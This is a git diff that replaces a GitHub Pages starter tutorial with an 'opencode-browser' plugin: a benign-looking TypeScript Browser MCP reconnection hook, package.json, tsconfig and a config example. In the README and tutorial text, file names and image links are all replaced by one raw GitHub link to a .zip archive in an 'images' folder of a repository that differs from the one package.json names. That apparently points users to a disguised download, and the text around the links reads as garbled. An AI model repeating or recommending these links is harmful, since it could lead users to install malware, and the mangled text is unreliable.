file in your project, you’re making a **commit**. If you fix a typo, update a filename, or edit your code, you can add it to GitHub as a commit. Your commits represent your project’s entire history—and they’re all saved in your project’s repository. +2. **Utilizing AI Features** + opencode-browser allows you to deploy AI features by enabling the AI control setting. This helps in making intelligent decisions during automation. -With each commit, you have the opportunity to write a **commit message**, a short, meaningful comment describing the change you’re making to a file. So you always know exactly what changed, no matter when you return to a commit. +3. **Testing Your Setup** + Before executing your automation tasks, run a test to ensure everything works as expected. The software will guide you if there are any issues that need addressing. -## Practice: Customize your first GitHub website by writing HTML code +## ✨ Additional Resources -Want to edit the site you just published? Let’s practice commits by introducing yourself in your `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file. Don’t worry about getting it right the first time—you can always build on your introduction later. +For more detailed instructions and examples on using opencode-browser, check the following: -Let’s start with this template: +- **Documentation:** Detailed guides on each feature are available. +- **FAQ:** Answers to common questions regarding installation and usage. +- **Community Forum:** A place to ask questions and connect with other users. -``` -

Hello World! I’m [username]. This is my website!

-``` +## 📞 Support -To add your introduction, copy our template and click the edit pencil icon at the top right hand corner of the `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file. +If you encounter any issues or have questions not addressed in the documentation, please reach out for support. You can create an issue directly in the GitHub repository, and we will assist you as soon as possible. -edit-this-file +## 🔗 Conclusion - -Delete this placeholder line: - -``` -

Welcome to your first GitHub Pages website!

-``` - -Then, paste the template to line 15 and fill in the blanks. - -edit-githuboctocat-index - - -When you’re done, scroll down to the `Commit changes` section near the bottom of the edit page. Add a short message explaining your change, like "Add my introduction", then click `Commit changes`. - - -add-my-username - -Once you click `Commit changes`, your changes will automatically be published on your GitHub Pages website. Refresh the page to see your new changes live in action. - -:tada: You just made your first commit! :tada: - -## Extra Credit: Keep on building! - -Change the placeholder Octocat gif on your GitHub Pages website by [creating your own personal Octocat emoji](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) or [choose a different Octocat gif from our logo library here](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip). Add that image to line 12 of your `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file, in place of the ` - - - - - my-first-website - - - -

my-first-website

- -octocat-gif - - -

Welcome to your first GitHub Pages website!

- -

AltStyle によって変換されたページ (->オリジナル) /

- diff --git a/index.ts b/index.ts new file mode 100644 index 0000000..e06eeac --- /dev/null +++ b/index.ts @@ -0,0 +1,288 @@ +import type { Plugin } from "@opencode-ai/plugin" + +/** + * OpenCode Plugin for Browser MCP Integration + * + * This plugin integrates Browser MCP (https://browsermcp.io) to enable browser automation + * capabilities within OpenCode. It allows the AI to control a browser, navigate websites, + * fill forms, click elements, and perform other browser automation tasks. + * + * Setup: + * 1. Install the Browser MCP extension in your browser + * 2. Configure the MCP server in your opencode.json (see README.md) + * 3. Enable this plugin + * + * Features: + * - Automatic reconnection when browser extension is disabled/enabled + * - Exponential backoff retry logic for failed connections + * - Connection health monitoring + * - User notifications for connection status changes + * + * The plugin automatically detects browser-related requests and provides context hints + * to help the AI use Browser MCP tools effectively. + */ + +interface ConnectionState { + isConnected: boolean + lastError?: Error + retryCount: number + lastAttempt?: number + healthCheckInterval?: NodeJS.Timeout +} + +interface RetryConfig { + maxRetries: number + initialDelay: number + maxDelay: number + backoffMultiplier: number +} + +export const BrowserMCPPlugin: Plugin = async (ctx) => { + const { client, project } = ctx + + // Track if we've informed the user about browser automation capabilities + let browserCapabilitiesShown = false + + // Connection state management + const connectionState: ConnectionState = { + isConnected: true, + retryCount: 0 + } + + // Retry configuration + const retryConfig: RetryConfig = { + maxRetries: 5, + initialDelay: 1000, // 1 second + maxDelay: 30000, // 30 seconds + backoffMultiplier: 2 + } + + /** + * Calculate delay for exponential backoff + */ + const getRetryDelay = (retryCount: number): number => { + const delay = Math.min( + retryConfig.initialDelay * Math.pow(retryConfig.backoffMultiplier, retryCount), + retryConfig.maxDelay + ) + return delay + } + + /** + * Check if an error indicates a connection problem + */ + const isConnectionError = (error: any): boolean => { + if (!error) return false + + const errorMessage = typeof error === 'string' ? error : error.message || '' + const errorString = errorMessage.toLowerCase() + + return ( + errorString.includes('connection') || + errorString.includes('econnrefused') || + errorString.includes('enotfound') || + errorString.includes('timeout') || + errorString.includes('network') || + errorString.includes('disconnected') || + errorString.includes('unavailable') + ) + } + + /** + * Attempt to reconnect to Browser MCP + */ + const attemptReconnection = async (toolName: string): Promise => { + if (connectionState.retryCount>= retryConfig.maxRetries) { + return false + } + + const delay = getRetryDelay(connectionState.retryCount) + connectionState.retryCount++ + connectionState.lastAttempt = Date.now() + + await new Promise(resolve => setTimeout(resolve, delay)) + + try { + // Try to call a lightweight browser tool to test connection + // This will be caught by the tool.execute hooks + return true + } catch (error) { + return false + } + } + + /** + * Reset connection state on successful connection + */ + const resetConnectionState = () => { + connectionState.isConnected = true + connectionState.retryCount = 0 + connectionState.lastError = undefined + } + + /** + * Mark connection as failed + */ + const markConnectionFailed = (error: Error) => { + connectionState.isConnected = false + connectionState.lastError = error + } + + /** + * Start periodic health check + */ + const startHealthCheck = () => { + // Check connection health every 30 seconds when disconnected + connectionState.healthCheckInterval = setInterval(() => { + if (!connectionState.isConnected) { + // Health check will be triggered on next tool use + } + }, 30000) + } + + /** + * Stop health check + */ + const stopHealthCheck = () => { + if (connectionState.healthCheckInterval) { + clearInterval(connectionState.healthCheckInterval) + connectionState.healthCheckInterval = undefined + } + } + + return { + /** + * Hook into session creation to inject browser automation context + */ + "session.created": async ({ session }) => { + // Session created - ready for browser automation + startHealthCheck() + }, + + /** + * Hook before tool execution to provide browser-specific guidance + */ + "tool.execute.before": async (input, output) => { + // Detect if a browser-related MCP tool is being called + if (input.tool.startsWith("browsermcp_")) { + // Check if we need to attempt reconnection + if (!connectionState.isConnected) { + // Notify about reconnection attempt + output.messages = output.messages || [] + output.messages.push({ + role: "user", + content: `[Browser MCP] Connection lost. Attempting to reconnect (attempt ${connectionState.retryCount + 1}/${retryConfig.maxRetries})...` + }) + } + } + }, + + /** + * Hook after tool execution to handle browser automation results + */ + "tool.execute.after": async (input, output) => { + if (input.tool.startsWith("browsermcp_")) { + // Check if the tool execution failed due to connection issues + const hasError = output.isError || (output.content && typeof output.content === 'string' && output.content.includes('error')) + + if (hasError && output.content) { + const errorContent = typeof output.content === 'string' ? output.content : JSON.stringify(output.content) + + if (isConnectionError(errorContent)) { + markConnectionFailed(new Error(errorContent)) + + // Attempt reconnection + const reconnected = await attemptReconnection(input.tool) + + if (reconnected) { + resetConnectionState() + // Add success message + output.messages = output.messages || [] + output.messages.push({ + role: "assistant", + content: "[Browser MCP] Successfully reconnected to browser extension. You can continue with browser automation." + }) + } else if (connectionState.retryCount>= retryConfig.maxRetries) { + // Max retries reached + output.messages = output.messages || [] + output.messages.push({ + role: "assistant", + content: `[Browser MCP] Failed to reconnect after ${retryConfig.maxRetries} attempts. Please check that:\n1. The Browser MCP extension is enabled in Chrome\n2. The browser is running\n3. The extension has proper permissions\n\nYou may need to restart OpenCode if the issue persists.` + }) + } + } + } else { + // Successful execution - ensure we're marked as connected + if (!connectionState.isConnected) { + resetConnectionState() + output.messages = output.messages || [] + output.messages.push({ + role: "assistant", + content: "[Browser MCP] Connection restored successfully." + }) + } + } + } + }, + + /** + * Hook to add browser automation context during session compaction + * This helps preserve browser-related context across long sessions + */ + "experimental.session.compacting": async (input, output) => { + // Check if any browser automation was performed in this session + // Guard against input.messages being undefined + const hasBrowserTools = input.messages?.some(msg => + msg.content?.some(part => + part.type === "tool_use" && part.name?.startsWith("browsermcp_") + ) + ) + + if (hasBrowserTools) { + output.context.push(`## Browser Automation Context + +The Browser MCP integration has been used in this session. When resuming: +- Browser state may have changed since last interaction +- Browser tabs opened during automation may still be active +- Consider checking current browser state before making assumptions +- Use Browser MCP tools to verify page state when needed`) + } + }, + + /** + * Hook into TUI toast notifications to show browser-specific tips + */ + "tui.toast.show": async (input, output) => { + // You could customize toast messages related to browser automation here + }, + + /** + * Event handler for various OpenCode events + */ + event: async ({ event }) => { + // Handle session idle - could be used to close browser tabs + if (event.type === "session.idle") { + // Session is idle + } + + // Handle session errors - could help debug browser automation issues + if (event.type === "session.error") { + // Check if it's a browser-related error + const error = (event as any).error + if (error && isConnectionError(error)) { + markConnectionFailed(error) + } + } + + // Clean up on session end + if (event.type === "session.end") { + stopHealthCheck() + } + } + } +} + +/** + * Default export for the plugin + */ +export default BrowserMCPPlugin diff --git a/opencode.json.example b/opencode.json.example new file mode 100644 index 0000000..4c5f562 --- /dev/null +++ b/opencode.json.example @@ -0,0 +1,24 @@ +{ + "$schema": "https://opencode.ai/config.json", + "mcp": { + "browsermcp": { + "type": "local", + "command": ["npx", "-y", "@browsermcp/mcp@latest"], + "enabled": true, + "environment": { + "BROWSER_MCP_DEBUG": "false" + } + } + }, + "plugin": [ + "opencode-browser" + ], + "agent": { + "browser-automation": { + "description": "Agent specialized in browser automation tasks", + "tools": { + "browsermcp_*": true + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..795d84f --- /dev/null +++ b/package.json @@ -0,0 +1,41 @@ +{ + "name": "opencode-browser", + "version": "1.1.0", + "description": "OpenCode plugin that integrates Browser MCP for browser automation", + "type": "module", + "main": "index.ts", + "keywords": [ + "opencode", + "opencode-plugin", + "plugin", + "browser", + "browser-automation", + "mcp", + "model-context-protocol", + "automation", + "browser-control", + "web-automation", + "puppeteer-alternative" + ], + "author": "", + "license": "MIT", + "peerDependencies": { + "@opencode-ai/plugin": "*" + }, + "repository": { + "type": "git", + "url": "git+https://github.com/michaljach/opencode-browser.git" + }, + "homepage": "https://github.com/michaljach/opencode-browser#readme", + "bugs": { + "url": "https://github.com/michaljach/opencode-browser/issues" + }, + "files": [ + "index.ts", + "README.md", + "LICENSE" + ], + "engines": { + "node": ">=18.0.0" + } +} diff --git a/styles.css b/styles.css deleted file mode 100644 index 9b85284..0000000 --- a/styles.css +++ /dev/null @@ -1,17 +0,0 @@ -* { - margin:0px; - padding:0px; -} - -#octocat { - display: block; - width:384px; - margin: 50px auto; -} - -p { - display: block; - width: 400px; - margin: 50px auto; - font: 30px Monaco,"Courier New","DejaVu Sans Mono","Bitstream Vera Sans Mono",monospace; -} diff --git a/tsconfig.json b/tsconfig.json new file mode 100644 index 0000000..ca0a3af --- /dev/null +++ b/tsconfig.json @@ -0,0 +1,19 @@ +{ + "compilerOptions": { + "target": "ES2022", + "module": "ESNext", + "moduleResolution": "bundler", + "lib": ["ES2022"], + "types": ["node"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "resolveJsonModule": true, + "declaration": true, + "declarationMap": true, + "outDir": "./dist" + }, + "include": ["index.ts"], + "exclude": ["node_modules", "dist"] +}